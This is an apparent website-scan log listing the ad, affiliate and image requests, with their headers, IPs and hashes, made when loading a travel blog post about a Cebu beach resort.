User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

Content-Type: image/png

GET
H3-Q050 200 load_preloaded_resource_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 3A61 1 KB
910 B 6ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/load_preloaded_resource_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

49aea8d1206dbb5e3c8a7d4db9274d2efa2111d8b53acb901efc378b1feca381

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 01:28:39 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 6147
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 882
x-xss-protection: 0
server: cafe
etag: 11243716317595354070
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 01:28:39 GMT

GET
H3-Q050 200 7efc730b264047f6b0bc7ba2cfe24db8.js Show response
www.gstatic.com/mysidia/ Frame 3A61 17 KB
7 KB 7ms
6ms Script
text/javascript 2a00:1450:4001:810::2003
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.gstatic.com/mysidia/7efc730b264047f6b0bc7ba2cfe24db8.js?tag=exit_2019

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:810::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

f1ae0255028c4d4b7e0584498f099d5f100227f57ee74f185a41ca011cbdbb51

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Wed, 31 Mar 2021 18:54:38 GMT
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Thu, 25 Mar 2021 05:14:52 GMT
server: sffe
age: 116188
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=7776000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 7306
x-xss-protection: 0
expires: Tue, 29 Jun 2021 18:54:38 GMT

GET
H3-Q050 200 enabler_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/mysidia/ Frame 3A61 3 KB
2 KB 7ms
7ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/mysidia/enabler_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

11776a02549cb7f5387e0635ffddf291e6a935f912058d075e1c686259b8bf1c

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 23:57:47 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 11599
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 1609
x-xss-protection: 0
server: cafe
etag: 7970124482520132131
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Thu, 15 Apr 2021 23:57:47 GMT

GET
H3-Q050 200 abg_lite_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/ Frame 3A61 17 KB
7 KB 7ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/abg_lite_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

b4e10c54a966ed5abeeac2aca4cfa968f317497770f59ec94af6d712db96e7d8

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:02:33 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 513
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 7115
x-xss-protection: 0
server: cafe
etag: 8094203328658613728
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 03:02:33 GMT

GET
H3-Q050 200 window_focus_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 3A61 2 KB
1 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/window_focus_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

731d7bd9ce2c95bf6af3d5719b995d714111949fb37b39919d45828875361233

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:01:36 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 570
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 1303
x-xss-protection: 0
server: cafe
etag: 14729628269804859526
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 03:01:36 GMT

GET
H3-Q050 200 rx_lidar.js Show response
www.googletagservices.com/activeview/js/current/ Frame 3A61 118 KB
36 KB 14ms
13ms Script
text/javascript 2a00:1450:4001:813::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:813::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

8727cf8bd32a94a8d93d7c75469184dada14c6cadf02178c17db5ee06f832b0f

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:06 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: sffe
etag: "1617218245166195"
vary: Accept-Encoding
content-type: text/javascript
cache-control: private, max-age=3000
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 36656
x-xss-protection: 0
expires: Fri, 02 Apr 2021 03:11:06 GMT

GET
H3-Q050 200 qs_click_protection_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 3A61 13 KB
5 KB 7ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/qs_click_protection_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

c9581d69ef8a7435f061d76045cc929310f436366f9ced3b9b9811ca6ed26feb

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 01:43:25 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 5261
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 5599
x-xss-protection: 0
server: cafe
etag: 2241650964481140939
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 01:43:25 GMT

GET
H3-Q050 204 l
www.google.com/ads/measurement/ Frame 3A61 0
0 14ms
14ms Image
text/html 2a00:1450:4001:812::2004
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.google.com/ads/measurement/l?ebcid=ALh7CaS8SCUsqECNm1HAHAR0FQQ7IkpdVxmkrCNYJPsGiKdXXbKu_KqWE6m3nkkpP_c_on6POfhgP1JWY0hYbO_lmReXaFWSCQ
Requested by: Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=1313&slotname=1929479831&adk=1389158022&adf=3725392101&pi=t.ma~as.1929479831&w=254&cr_col=1&cr_row=6&lmt=1617333066&rafmt=9&psa=0&format=254x1313&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&crui=pub_control_image_card_stacked&wgl=1&dt=1617333065842&bpp=2&bdt=341&idt=233&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=578&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=8&uci=a!8&fsb=1&xpc=iWA0bk5tzq&p=https%3A//www.itravelrox.com&dtd=237
Protocol: H3-Q050
Security: QUIC, , AES_128_GCM
Server: 2a00:1450:4001:812::2004 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),
Reverse DNS
Software: /
Resource Hash: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

GET
H3-Q050 200 16080890373574583527
tpc.googlesyndication.com/daca_images/simgad/ Frame 3A61 14 KB
14 KB 7ms
6ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/daca_images/simgad/16080890373574583527?w=400&h=209

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

14708a329f9a6591dd31c95a3c981726094b5d35fb6d4599058572ce9a797629

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Wed, 31 Mar 2021 00:49:03 GMT
x-content-type-options: nosniff
age: 181323
x-dns-prefetch-control: off
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 14609
x-xss-protection: 0
last-modified: Tue, 03 May 2016 00:38:20 GMT
server: sffe
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=604800
accept-ranges: bytes
timing-allow-origin: *
expires: Wed, 07 Apr 2021 00:49:03 GMT

GET
H3-Q050 200 downsize_200k_v1
tpc.googlesyndication.com/simgad/153408026266371312/ Frame 3A61 14 KB
14 KB 7ms
7ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/simgad/153408026266371312/downsize_200k_v1?w=400&h=209

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

fc1bd27037ddaf6e6e014be417c5c90167e5e720e6e9a8715434acafd47bcbdb

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 13:40:06 GMT
x-content-type-options: nosniff
age: 48660
x-dns-prefetch-control: off
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 14088
x-xss-protection: 0
last-modified: Mon, 25 Jan 2021 12:05:11 GMT
server: sffe
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
expires: Fri, 01 Apr 2022 13:40:06 GMT

GET
H3-Q050 200 6304781372297005788
tpc.googlesyndication.com/icore_images/ Frame 3A61 14 KB
14 KB 46ms
44ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/icore_images/6304781372297005788

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

09c470fa9dc635b7f9d3cd0939b81267e717f12283277ce33f478c931c225504

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:06 GMT
x-content-type-options: nosniff
last-modified: Tue, 10 Dec 2019 17:32:17 GMT
server: sffe
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
timing-allow-origin: *
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 14381
x-xss-protection: 0
expires: Sat, 02 Apr 2022 03:11:06 GMT

GET
H3-Q050 200 3173157285560241804
tpc.googlesyndication.com/daca_images/simgad/ Frame 3A61 24 KB
24 KB 8ms
6ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/daca_images/simgad/3173157285560241804?w=400&h=209

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

d8b516a182978fc95e293b4ec81305b7b0cd3d590359fbdd5c2f9ac4b01321f8

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Wed, 31 Mar 2021 10:11:57 GMT
x-content-type-options: nosniff
age: 147549
x-dns-prefetch-control: off
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 24935
x-xss-protection: 0
last-modified: Fri, 26 Aug 2016 17:37:05 GMT
server: sffe
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=604800
accept-ranges: bytes
timing-allow-origin: *
expires: Wed, 07 Apr 2021 10:11:57 GMT

GET
H3-Q050 200 10766026152498027033
tpc.googlesyndication.com/icore_images/ Frame 3A61 32 KB
32 KB 54ms
52ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/icore_images/10766026152498027033

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

9df547641dd3e7f1f78af5bde36d04134692567cf9f65346196fcdaada742821

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:06 GMT
x-content-type-options: nosniff
last-modified: Wed, 11 Nov 2020 12:20:40 GMT
server: sffe
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
timing-allow-origin: *
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 32601
x-xss-protection: 0
expires: Sat, 02 Apr 2022 03:11:06 GMT

GET
H3-Q050 200 6770573343964419495
tpc.googlesyndication.com/icore_images/ Frame 3A61 18 KB
18 KB 83ms
82ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/icore_images/6770573343964419495

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

76111cb44cd0cca4b38efe46d5b8e33f61e381249fc4a0b39434afe0f49c85fe

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:06 GMT
x-content-type-options: nosniff
last-modified: Mon, 02 Sep 2019 05:36:38 GMT
server: sffe
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
timing-allow-origin: *
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 18214
x-xss-protection: 0
expires: Sat, 02 Apr 2022 03:11:06 GMT

GET
H/1.0 404
Not Found ss.js
synad3.nuffnang.com.ph/ 0
0 459ms
120ms Script
text/html 2600:3c02:1::2d4f:f40e
LINODE-AP Linode

General

Check archive.org

Show headers Download Go to

Full URL: https://synad3.nuffnang.com.ph/ss.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: HTTP/1.0
Security: TLS 1.3, , AES_256_GCM
Server: 2600:3c02:1::2d4f:f40e , United States, ASN63949 (LINODE-AP Linode, LLC, US),
Reverse DNS
Software: /
Resource Hash

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

GET
H/1.1 200
OK flexiproduct.js Show response
aff.bstatic.com/static/affiliate_base/js/ 6 KB
3 KB 120ms
40ms Script
application/javascript 5.57.16.90
BOOKING-BV Bookin...

General

Check archive.org

Show headers Download Go to

Full URL

https://aff.bstatic.com/static/affiliate_base/js/flexiproduct.js?v=1617333066960

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

HTTP/1.1

Security

TLS 1.3, , AES_128_GCM

Server

5.57.16.90 , Netherlands, ASN43996 (BOOKING-BV Booking.com, NL),

Reverse DNS

bstatic.com

Software

nginx /

Resource Hash

c553ef7271334af93285181e0b891ecc964712f12d02af54ecee9c58354c71e6

Security Headers

Name	Value
X-Xss-Protection	1; mode=block

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
content-encoding: br
last-modified: Tue, 04 Feb 2020 10:19:54 GMT
server: nginx
etag: W/"5e39454a-186e"
vary: Accept-Encoding
report-to: {"endpoints":[{"url":"https://nellie.booking.com/report"}],"max_age":600,"group":"default","failure_fraction":0.05}
content-type: application/javascript
access-control-allow-origin: *
cache-control: max-age=2592000
transfer-encoding: chunked
timing-allow-origin: *
nel: {"report_to":"default","max_age":600}
x-xss-protection: 1; mode=block
expires: Sun, 02 May 2021 03:11:07 GMT

GET
H/1.1 200
OK Index Show response
sherpa.agoda.com/Static/ Frame C273 3 KB
2 KB 153ms
53ms Document
text/html 203.160.137.61
AGODA-TH-AS-AP Th...

General

Check archive.org

Show headers Download Go to

Full URL: https://sherpa.agoda.com/Static/Index?ReferenceKey=obYl0BHxMMiU7D8PQ33upA%3D%3D&Language=en-us&Hg=300px&Wd=300px&OverideConf=false&Layout=SquareStatic&MobOptimized=true&Ver=1.03&Crt=7219864560299
Requested by: Host: cdn0.agoda.net
URL: https://cdn0.agoda.net/images/sherpa/js/sherpa_init1_04.min.js
Protocol: HTTP/1.1
Security: TLS 1.2, ECDHE_RSA, AES_256_GCM
Server: 203.160.137.61 , Netherlands, ASN45530 (AGODA-TH-AS-AP The Offices at Central World, 27th floor, TH),
Reverse DNS
Software: Kestrel / ASP.NET
Resource Hash: f7cde590ee51e15b5e1028d6ebb9ad4f4bf4f07248dce623145b5a942335ffee

Request headers

Host: sherpa.agoda.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: https://www.itravelrox.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://www.itravelrox.com/

Response headers

Cache-Control: public,max-age=300
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Kestrel
X-Powered-By: ASP.NET
Date: Fri, 02 Apr 2021 03:11:07 GMT

GET
H3-Q050 200 adview
googleads.g.doubleclick.net/pagead/ Frame 3A61 0
0 20ms
18ms Fetch
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

